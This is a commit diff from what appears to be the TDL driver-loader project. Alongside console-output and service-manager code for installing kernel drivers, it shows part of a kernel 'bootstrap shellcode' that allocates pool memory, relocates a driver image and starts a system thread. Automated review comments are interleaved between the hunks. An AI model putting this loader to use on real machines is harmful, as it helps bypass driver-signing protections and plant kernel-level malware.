small update
hfiref0x 2017-04-17 18:45:41 +07:00
parent 20a4e9b210
commit 7e4aec975f
17 changed files with 1248 additions and 1295 deletions

17
.gitattributes vendored

@ -1,17 +0,0 @@
# Auto detect text files and perform LF normalization
* text=auto
# Custom for Visual Studio
*.cs diff=csharp
# Standard to msysgit
*.doc diff=astextplain
*.DOC diff=astextplain
*.docx diff=astextplain
*.DOCX diff=astextplain
*.dot diff=astextplain
*.DOT diff=astextplain
*.pdf diff=astextplain
*.PDF diff=astextplain
*.rtf diff=astextplain
*.RTF diff=astextplain

Binary file not shown.


@ -32,7 +32,7 @@ In order to build from source you need Microsoft Visual Studio 2015 U1 and later
# Authors
(c) 2016 TDL Project
(c) 2016 - 2017 TDL Project
# Credits


@ -1,7 +1,7 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 14
VisualStudioVersion = 14.0.24720.0
VisualStudioVersion = 14.0.25420.1
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Furutaka", "Furutaka.vcxproj", "{8CC15B84-9FA8-4F5E-934F-7DAE7BAC4896}"
EndProject


@ -1,14 +1,6 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
@ -26,19 +18,6 @@
<ProjectName>Furutaka</ProjectName>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v140</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v140</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
@ -57,12 +36,6 @@
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
@ -70,20 +43,10 @@
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
@ -93,23 +56,6 @@
<CodeAnalysisRuleSet>NativeRecommendedRules.ruleset</CodeAnalysisRuleSet>
<RunCodeAnalysis>false</RunCodeAnalysis>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level4</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
<CompileAs>CompileAsC</CompileAs>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EntryPointSymbol>TDLMain</EntryPointSymbol>
<UACExecutionLevel>RequireAdministrator</UACExecutionLevel>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<PrecompiledHeader>
@ -124,30 +70,7 @@
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EntryPointSymbol>TDLMain</EntryPointSymbol>
<UACExecutionLevel>RequireAdministrator</UACExecutionLevel>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level4</WarningLevel>
<PrecompiledHeader>
</PrecompiledHeader>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
<CompileAs>CompileAsC</CompileAs>
<MultiProcessorCompilation>true</MultiProcessorCompilation>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EntryPointSymbol>TDLMain</EntryPointSymbol>
<SetChecksum>true</SetChecksum>
<UACExecutionLevel>RequireAdministrator</UACExecutionLevel>
<UACExecutionLevel>AsInvoker</UACExecutionLevel>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
@ -164,6 +87,8 @@
<MultiProcessorCompilation>true</MultiProcessorCompilation>
<StringPooling>true</StringPooling>
<EnablePREfast>false</EnablePREfast>
<ControlFlowGuard>Guard</ControlFlowGuard>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
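Review bot: The link settings that appear to belong to Debug|x64 switch `UACExecutionLevel` from `RequireAdministrator` to `AsInvoker`, yet INSTDRV.C in this same commit opens the service control manager with `SC_MANAGER_ALL_ACCESS`, which an unelevated process is not granted. A debug build started without elevation would therefore fail at OpenSCManager, and scmLoadDeviceDriver only reports FALSE. If the intent is to let the debugger start the process without a UAC prompt, say so in the commit message; otherwise keep `<UACExecutionLevel>RequireAdministrator</UACExecutionLevel>` so the manifest matches what the code requests. The Release|x64 value lies outside the visible hunks, so any difference between the two x64 configurations is inferred.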


@ -4,14 +4,6 @@
<LocalDebuggerCommandArguments>C:\MAKEEXE\TurlaDriverLoader\Loader\drv\Tsugumi.sys</LocalDebuggerCommandArguments>
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LocalDebuggerCommandArguments>C:\MAKEEXE\TurlaDriverLoader\Loader\drv\Tsugumi.sys</LocalDebuggerCommandArguments>
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LocalDebuggerCommandArguments>C:\MAKEEXE\TurlaDriverLoader\Loader\drv\TsugumiKernel.sys</LocalDebuggerCommandArguments>
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LocalDebuggerCommandArguments>C:\MAKEEXE\TurlaDriverLoader\Loader\drv\TsugumiKernel.sys</LocalDebuggerCommandArguments>
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>


@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2016
* (C) COPYRIGHT AUTHORS, 2016 - 2017
*
* TITLE: CUI.C
*
* VERSION: 1.00
* VERSION: 1.10
*
* DATE: 18 Jan 2016
* DATE: 20 Mar 2017
*
* Console output.
*
@ -19,46 +19,95 @@
#include "global.h"
/*
* cuiPrintText
* cuiPrintTextA
*
* Purpose:
*
* Output text to the console or file.
*
* ANSI variant
*
*/
VOID cuiPrintText(
_In_ HANDLE hOutConsole,
_In_ LPWSTR lpText,
_In_ BOOL ConsoleOutputEnabled,
_In_ BOOL UseReturn
)
VOID cuiPrintTextA(
_In_ HANDLE hOutConsole,
_In_ LPSTR lpText,
_In_ BOOL ConsoleOutputEnabled,
_In_ BOOL UseReturn
)
{
SIZE_T consoleIO;
DWORD bytesIO;
LPWSTR Buffer;
SIZE_T consoleIO;
DWORD bytesIO;
LPSTR Buffer;
if (lpText == NULL)
return;
if (lpText == NULL)
return;
consoleIO = _strlen(lpText);
if ((consoleIO == 0) || (consoleIO > MAX_PATH * 4))
return;
consoleIO = _strlen_a(lpText);
if ((consoleIO == 0) || (consoleIO > MAX_PATH * 4))
return;
consoleIO = consoleIO * sizeof(WCHAR) + 4 + sizeof(UNICODE_NULL);
Buffer = (LPWSTR)RtlAllocateHeap(RtlGetCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, consoleIO);
if (Buffer) {
consoleIO = (5 + consoleIO);
Buffer = (LPSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, consoleIO);
if (Buffer) {
_strcpy(Buffer, lpText);
if (UseReturn) _strcat(Buffer, TEXT("\r\n"));
_strcpy_a(Buffer, lpText);
if (UseReturn) _strcat_a(Buffer, "\r\n");
consoleIO = _strlen(Buffer);
consoleIO = _strlen_a(Buffer);
if (ConsoleOutputEnabled == TRUE) {
WriteConsole(hOutConsole, Buffer, (DWORD)consoleIO, &bytesIO, NULL);
}
else {
WriteFile(hOutConsole, Buffer, (DWORD)(consoleIO * sizeof(WCHAR)), &bytesIO, NULL);
}
RtlFreeHeap(RtlGetCurrentPeb()->ProcessHeap, 0, Buffer);
}
if (ConsoleOutputEnabled != FALSE) {
WriteConsoleA(hOutConsole, Buffer, (DWORD)consoleIO, &bytesIO, NULL);
}
else {
WriteFile(hOutConsole, Buffer, (DWORD)(consoleIO * sizeof(CHAR)), &bytesIO, NULL);
}
HeapFree(GetProcessHeap(), 0, Buffer);
}
}
/*
* cuiPrintTextW
*
* Purpose:
*
* Output text to the console or file.
*
* UNICODE variant
*
*/
VOID cuiPrintTextW(
_In_ HANDLE hOutConsole,
_In_ LPWSTR lpText,
_In_ BOOL ConsoleOutputEnabled,
_In_ BOOL UseReturn
)
{
SIZE_T consoleIO;
DWORD bytesIO;
LPWSTR Buffer;
if (lpText == NULL)
return;
consoleIO = _strlen(lpText);
if ((consoleIO == 0) || (consoleIO > MAX_PATH * 4))
return;
consoleIO = (5 + consoleIO) * sizeof(WCHAR);
Buffer = (LPWSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, consoleIO);
if (Buffer) {
_strcpy(Buffer, lpText);
if (UseReturn) _strcat(Buffer, TEXT("\r\n"));
consoleIO = _strlen(Buffer);
if (ConsoleOutputEnabled != FALSE) {
WriteConsole(hOutConsole, Buffer, (DWORD)consoleIO, &bytesIO, NULL);
}
else {
WriteFile(hOutConsole, Buffer, (DWORD)(consoleIO * sizeof(WCHAR)), &bytesIO, NULL);
}
HeapFree(GetProcessHeap(), 0, Buffer);
}
}
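Review bot: cuiPrintTextW is declared as the wide variant (it takes `LPWSTR`), but its body still uses the TCHAR-generic names `_strlen`, `_strcpy`, `_strcat`, `TEXT("\r\n")` and `WriteConsole`, so it is only type-correct when UNICODE is defined. CUI.H in this commit maps cuiPrintText to cuiPrintTextA when UNICODE is absent, so a non-UNICODE build is anticipated, and there `WriteConsole` resolves to WriteConsoleA and the literal is narrow while the buffer holds WCHARs. Pin the wide forms explicitly, e.g. `if (UseReturn) _strcat_w(Buffer, L"\r\n");` and `WriteConsoleW(hOutConsole, Buffer, (DWORD)consoleIO, &bytesIO, NULL);` (this assumes the runtime helpers have `_w` counterparts to the `_a` ones used in cuiPrintTextA). Both variants also silently drop text longer than `MAX_PATH * 4` and ignore the WriteConsole/WriteFile result; a header comment stating that output is best-effort would document that.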


@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2016
* (C) COPYRIGHT AUTHORS, 2016 - 2017
*
* TITLE: CUI.H
*
* VERSION: 1.00
* VERSION: 1.10
*
* DATE: 18 Jan 2016
* DATE: 04 Feb 2017
*
* Common header file for console ui.
*
@ -18,11 +18,22 @@
*******************************************************************************/
#pragma once
#include "global.h"
VOID cuiPrintTextA(
_In_ HANDLE hOutConsole,
_In_ LPSTR lpText,
_In_ BOOL ConsoleOutputEnabled,
_In_ BOOL UseReturn
);
VOID cuiPrintText(
_In_ HANDLE hOutConsole,
_In_ LPWSTR lpText,
_In_ BOOL ConsoleOutputEnabled,
_In_ BOOL UseReturn
);
VOID cuiPrintTextW(
_In_ HANDLE hOutConsole,
_In_ LPWSTR lpText,
_In_ BOOL ConsoleOutputEnabled,
_In_ BOOL UseReturn
);
#ifdef UNICODE
#define cuiPrintText cuiPrintTextW
#else
#define cuiPrintText cuiPrintTextA
#endif


@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2016
* (C) COPYRIGHT AUTHORS, 2016 - 2017
*
* TITLE: GLOBAL.H
*
* VERSION: 1.00
* VERSION: 1.10
*
* DATE: 01 Feb 2016
* DATE: 17 Apr 2017
*
* Common header file for the program support routines.
*


@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2015 - 2016, portions (C) Mark Russinovich, FileMon
* (C) COPYRIGHT AUTHORS, 2015 - 2017, portions (C) Mark Russinovich, FileMon
*
* TITLE: INSTDRV.C
*
* VERSION: 1.11
* VERSION: 1.10
*
* DATE: 01 Feb 2016
* DATE: 17 Apr 2017
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@ -25,33 +25,33 @@
*
*/
BOOL scmInstallDriver(
_In_ SC_HANDLE SchSCManager,
_In_ LPCTSTR DriverName,
_In_opt_ LPCTSTR ServiceExe
)
_In_ SC_HANDLE SchSCManager,
_In_ LPCTSTR DriverName,
_In_opt_ LPCTSTR ServiceExe
)
{
SC_HANDLE schService;
SC_HANDLE schService;
schService = CreateService(SchSCManager, // SCManager database
DriverName, // name of service
DriverName, // name to display
SERVICE_ALL_ACCESS, // desired access
SERVICE_KERNEL_DRIVER, // service type
SERVICE_DEMAND_START, // start type
SERVICE_ERROR_NORMAL, // error control type
ServiceExe, // service's binary
NULL, // no load ordering group
NULL, // no tag identifier
NULL, // no dependencies
NULL, // LocalSystem account
NULL // no password
);
if (schService == NULL) {
return FALSE;
}
schService = CreateService(SchSCManager, // SCManager database
DriverName, // name of service
DriverName, // name to display
SERVICE_ALL_ACCESS, // desired access
SERVICE_KERNEL_DRIVER, // service type
SERVICE_DEMAND_START, // start type
SERVICE_ERROR_NORMAL, // error control type
ServiceExe, // service's binary
NULL, // no load ordering group
NULL, // no tag identifier
NULL, // no dependencies
NULL, // LocalSystem account
NULL // no password
);
if (schService == NULL) {
return FALSE;
}
CloseServiceHandle(schService);
return TRUE;
CloseServiceHandle(schService);
return TRUE;
}
/*
@ -63,26 +63,26 @@ BOOL scmInstallDriver(
*
*/
BOOL scmStartDriver(
_In_ SC_HANDLE SchSCManager,
_In_ LPCTSTR DriverName
)
_In_ SC_HANDLE SchSCManager,
_In_ LPCTSTR DriverName
)
{
SC_HANDLE schService;
BOOL ret;
SC_HANDLE schService;
BOOL ret;
schService = OpenService(SchSCManager,
DriverName,
SERVICE_ALL_ACCESS
);
if (schService == NULL)
return FALSE;
schService = OpenService(SchSCManager,
DriverName,
SERVICE_ALL_ACCESS
);
if (schService == NULL)
return FALSE;
ret = StartService(schService, 0, NULL)
|| GetLastError() == ERROR_SERVICE_ALREADY_RUNNING;
ret = StartService(schService, 0, NULL)
|| GetLastError() == ERROR_SERVICE_ALREADY_RUNNING;
CloseServiceHandle(schService);
CloseServiceHandle(schService);
return ret;
return ret;
}
/*
@ -94,35 +94,35 @@ BOOL scmStartDriver(
*
*/
BOOL scmOpenDevice(
_In_ LPCTSTR DriverName,
_Inout_opt_ PHANDLE lphDevice
)
_In_ LPCTSTR DriverName,
_Inout_opt_ PHANDLE lphDevice
)
{
TCHAR completeDeviceName[64];
HANDLE hDevice;
TCHAR completeDeviceName[64];
HANDLE hDevice;
RtlSecureZeroMemory(completeDeviceName, sizeof(completeDeviceName));
wsprintf(completeDeviceName, TEXT("\\\\.\\%s"), DriverName);
RtlSecureZeroMemory(completeDeviceName, sizeof(completeDeviceName));
wsprintf(completeDeviceName, TEXT("\\\\.\\%s"), DriverName);
hDevice = CreateFile(completeDeviceName,
GENERIC_READ | GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL
);
if (hDevice == INVALID_HANDLE_VALUE)
return FALSE;
hDevice = CreateFile(completeDeviceName,
GENERIC_READ | GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL
);
if (hDevice == INVALID_HANDLE_VALUE)
return FALSE;
if (lphDevice) {
*lphDevice = hDevice;
}
else {
CloseHandle(hDevice);
}
if (lphDevice) {
*lphDevice = hDevice;
}
else {
CloseHandle(hDevice);
}
return TRUE;
return TRUE;
}
/*
@ -134,39 +134,39 @@ BOOL scmOpenDevice(
*
*/
BOOL scmStopDriver(
_In_ SC_HANDLE SchSCManager,
_In_ LPCTSTR DriverName
)
_In_ SC_HANDLE SchSCManager,
_In_ LPCTSTR DriverName
)
{
INT iRetryCount;
SC_HANDLE schService;
BOOL ret;
SERVICE_STATUS serviceStatus;
BOOL ret;
INT iRetryCount;
SC_HANDLE schService;
SERVICE_STATUS serviceStatus;
ret = FALSE;
schService = OpenService(SchSCManager, DriverName, SERVICE_ALL_ACCESS);
if (schService == NULL) {
return ret;
}
ret = FALSE;
schService = OpenService(SchSCManager, DriverName, SERVICE_ALL_ACCESS);
if (schService == NULL) {
return ret;
}
iRetryCount = 5;
do {
SetLastError(0);
iRetryCount = 5;
do {
SetLastError(0);
ret = ControlService(schService, SERVICE_CONTROL_STOP, &serviceStatus);
if (ret == TRUE)
break;
ret = ControlService(schService, SERVICE_CONTROL_STOP, &serviceStatus);
if (ret != FALSE)
break;
if (GetLastError() != ERROR_DEPENDENT_SERVICES_RUNNING)
break;
if (GetLastError() != ERROR_DEPENDENT_SERVICES_RUNNING)
break;
Sleep(1000);
iRetryCount--;
} while (iRetryCount);
Sleep(1000);
iRetryCount--;
} while (iRetryCount);
CloseServiceHandle(schService);
CloseServiceHandle(schService);
return ret;
return ret;
}
/*
@ -178,27 +178,19 @@ BOOL scmStopDriver(
*
*/
BOOL scmRemoveDriver(
_In_ SC_HANDLE SchSCManager,
_In_ LPCTSTR DriverName
)
_In_ SC_HANDLE SchSCManager,
_In_ LPCTSTR DriverName
)
{
SC_HANDLE schService;
BOOL bResult = FALSE;
SC_HANDLE schService;
BOOL bResult = FALSE;
schService = OpenService(SchSCManager,
DriverName,
DELETE
);
if (schService == NULL) {
return bResult;
}
bResult = DeleteService(schService);
CloseServiceHandle(schService);
return bResult;
schService = OpenService(SchSCManager, DriverName, SERVICE_ALL_ACCESS);
if (schService) {
bResult = DeleteService(schService);
CloseServiceHandle(schService);
}
return bResult;
}
/*
@ -210,26 +202,23 @@ BOOL scmRemoveDriver(
*
*/
BOOL scmUnloadDeviceDriver(
_In_ LPCTSTR Name
)
_In_ LPCTSTR Name
)
{
SC_HANDLE schSCManager;
BOOL bResult = FALSE;
SC_HANDLE schSCManager;
BOOL bResult = FALSE;
if (Name == NULL) {
return bResult;
}
if (Name == NULL) {
return bResult;
}
schSCManager = OpenSCManager(NULL,
NULL,
SC_MANAGER_ALL_ACCESS
);
if (schSCManager) {
scmStopDriver(schSCManager, Name);
bResult = scmRemoveDriver(schSCManager, Name);
CloseServiceHandle(schSCManager);
}
return bResult;
schSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
if (schSCManager) {
scmStopDriver(schSCManager, Name);
bResult = scmRemoveDriver(schSCManager, Name);
CloseServiceHandle(schSCManager);
}
return bResult;
}
/*
@ -241,25 +230,25 @@ BOOL scmUnloadDeviceDriver(
*
*/
BOOL scmLoadDeviceDriver(
_In_ LPCTSTR Name,
_In_opt_ LPCTSTR Path,
_Inout_ PHANDLE lphDevice
)
_In_ LPCTSTR Name,
_In_opt_ LPCTSTR Path,
_Inout_ PHANDLE lphDevice
)
{
SC_HANDLE schSCManager;
BOOL bResult = FALSE;
SC_HANDLE schSCManager;
BOOL bResult = FALSE;
if (Name == NULL) {
return bResult;
}
if (Name == NULL) {
return bResult;
}
schSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
if (schSCManager) {
scmRemoveDriver(schSCManager, Name);
scmInstallDriver(schSCManager, Name, Path);
scmStartDriver(schSCManager, Name);
bResult = scmOpenDevice(Name, lphDevice);
CloseServiceHandle(schSCManager);
}
return bResult;
schSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
if (schSCManager) {
scmRemoveDriver(schSCManager, Name);
scmInstallDriver(schSCManager, Name, Path);
scmStartDriver(schSCManager, Name);
bResult = scmOpenDevice(Name, lphDevice);
CloseServiceHandle(schSCManager);
}
return bResult;
}
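Review bot: scmRemoveDriver now opens the service with `SERVICE_ALL_ACCESS` where the previous side asked only for `DELETE`, which is all DeleteService needs; the full mask widens the handle's rights for no visible benefit and makes the open fail wherever only DELETE would have been granted. Keep the compact form but restore the narrow mask: `schService = OpenService(SchSCManager, DriverName, DELETE);`. By the same least-privilege reasoning, scmStartDriver and scmStopDriver (only re-indented here) could request `SERVICE_START` and `SERVICE_STOP` instead of `SERVICE_ALL_ACCESS`. In scmOpenDevice, `wsprintf(completeDeviceName, TEXT("\\\\.\\%s"), DriverName)` formats a caller-supplied name into a 64-TCHAR stack buffer with no length check, so the function should reject a DriverName that does not fit before formatting. The header comment's VERSION also moves from 1.11 to 1.10 in this file, which looks unintended.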


@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2015, portions (C) Mark Russinovich, FileMon
* (C) COPYRIGHT AUTHORS, 2015 - 2017, portions (C) Mark Russinovich, FileMon
*
* TITLE: INSTDRV.H
*
* VERSION: 1.10
*
* DATE: 10 Mar 2015
* DATE: 17 Apr 2017
*
* Common header file for the program SCM usage.
*
@ -16,39 +16,40 @@
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once
BOOL scmInstallDriver(
_In_ SC_HANDLE SchSCManager,
_In_ LPCTSTR DriverName,
_In_opt_ LPCTSTR ServiceExe
);
_In_ SC_HANDLE SchSCManager,
_In_ LPCTSTR DriverName,
_In_opt_ LPCTSTR ServiceExe
);
BOOL scmStartDriver(
_In_ SC_HANDLE SchSCManager,
_In_ LPCTSTR DriverName
);
_In_ SC_HANDLE SchSCManager,
_In_ LPCTSTR DriverName
);
BOOL scmOpenDevice(
_In_ LPCTSTR DriverName,
_Inout_opt_ PHANDLE lphDevice
);
_In_ LPCTSTR DriverName,
_Inout_opt_ PHANDLE lphDevice
);
BOOL scmStopDriver(
_In_ SC_HANDLE SchSCManager,
_In_ LPCTSTR DriverName
);
_In_ SC_HANDLE SchSCManager,
_In_ LPCTSTR DriverName
);
BOOL scmRemoveDriver(
_In_ SC_HANDLE SchSCManager,
_In_ LPCTSTR DriverName
);
_In_ SC_HANDLE SchSCManager,
_In_ LPCTSTR DriverName
);
BOOL scmUnloadDeviceDriver(
_In_ LPCTSTR Name
);
_In_ LPCTSTR Name
);
BOOL scmLoadDeviceDriver(
_In_ LPCTSTR Name,
_In_opt_ LPCTSTR Path,
_Inout_ PHANDLE lphDevice
);
_In_ LPCTSTR Name,
_In_opt_ LPCTSTR Path,
_Inout_ PHANDLE lphDevice
);

File diff suppressed because it is too large Load Diff

Binary file not shown.


@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2016
* (C) COPYRIGHT AUTHORS, 2016 - 2017
*
* TITLE: SHELLCODE.H
*
* VERSION: 1.00
* VERSION: 1.10
*
* DATE: 30 Jan 2016
* DATE: 17 Apr 2017
*
* Loader bootstrap shellcode.
*
@ -20,20 +20,20 @@
#pragma once
typedef PVOID(NTAPI *PfnExAllocatePoolWithTag)(
_In_ POOL_TYPE PoolType,
_In_ SIZE_T NumberOfBytes,
_In_ ULONG Tag
);
_In_ POOL_TYPE PoolType,
_In_ SIZE_T NumberOfBytes,
_In_ ULONG Tag
);
typedef NTSTATUS(NTAPI *PfnPsCreateSystemThread)(
_Out_ PHANDLE ThreadHandle,
_In_ ULONG DesiredAccess,
_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
_In_opt_ HANDLE ProcessHandle,
_Out_opt_ PCLIENT_ID ClientId,
_In_ PKSTART_ROUTINE StartRoutine,
_In_opt_ PVOID StartContext
);
_Out_ PHANDLE ThreadHandle,
_In_ ULONG DesiredAccess,
_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
_In_opt_ HANDLE ProcessHandle,
_Out_opt_ PCLIENT_ID ClientId,
_In_ PKSTART_ROUTINE StartRoutine,
_In_opt_ PVOID StartContext
);
/*
* TDLBootstrapLoader
@ -45,101 +45,101 @@ typedef NTSTATUS(NTAPI *PfnPsCreateSystemThread)(
*/
/*
void TDLBootstrapLoader(
PfnExAllocatePoolWithTag ExAllocatePoolWithTag,
PfnPsCreateSystemThread PsCreateSystemThread)
PfnExAllocatePoolWithTag ExAllocatePoolWithTag,
PfnPsCreateSystemThread PsCreateSystemThread)
{
ULONG_PTR pos, exbuffer,
Image = ((ULONG_PTR)&TDLBootstrapLoader) + 0x200;
ULONG_PTR pos, exbuffer,
Image = ((ULONG_PTR)&TDLBootstrapLoader) + 0x200;
PIMAGE_DOS_HEADER dosh = (PIMAGE_DOS_HEADER)Image;
PIMAGE_FILE_HEADER fileh =
(PIMAGE_FILE_HEADER)(Image + sizeof(DWORD) + dosh->e_lfanew);
PIMAGE_DOS_HEADER dosh = (PIMAGE_DOS_HEADER)Image;
PIMAGE_FILE_HEADER fileh =
(PIMAGE_FILE_HEADER)(Image + sizeof(DWORD) + dosh->e_lfanew);
PIMAGE_OPTIONAL_HEADER popth =
(PIMAGE_OPTIONAL_HEADER)((PBYTE)fileh + sizeof(IMAGE_FILE_HEADER));
PIMAGE_OPTIONAL_HEADER popth =
(PIMAGE_OPTIONAL_HEADER)((PBYTE)fileh + sizeof(IMAGE_FILE_HEADER));
ULONG isz = popth->SizeOfImage;
HANDLE th;
ULONG isz = popth->SizeOfImage;
HANDLE th;
PIMAGE_BASE_RELOCATION rel;
DWORD_PTR delta;
LPWORD chains;
DWORD c, p, rsz;
PIMAGE_BASE_RELOCATION rel;
DWORD_PTR delta;
LPWORD chains;
DWORD c, p, rsz;
OBJECT_ATTRIBUTES attr;
OBJECT_ATTRIBUTES attr;
exbuffer = (ULONG_PTR)ExAllocatePoolWithTag(
NonPagedPool, isz + PAGE_SIZE, 'SldT') + PAGE_SIZE;
exbuffer &= ~(PAGE_SIZE - 1);
exbuffer = (ULONG_PTR)ExAllocatePoolWithTag(
NonPagedPool, isz + PAGE_SIZE, 'SldT') + PAGE_SIZE;
exbuffer &= ~(PAGE_SIZE - 1);
if (popth->NumberOfRvaAndSizes > IMAGE_DIRECTORY_ENTRY_BASERELOC)
if (popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress != 0)
{
rel = (PIMAGE_BASE_RELOCATION)((PBYTE)Image +
popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress);
if (popth->NumberOfRvaAndSizes > IMAGE_DIRECTORY_ENTRY_BASERELOC)
if (popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress != 0)
{
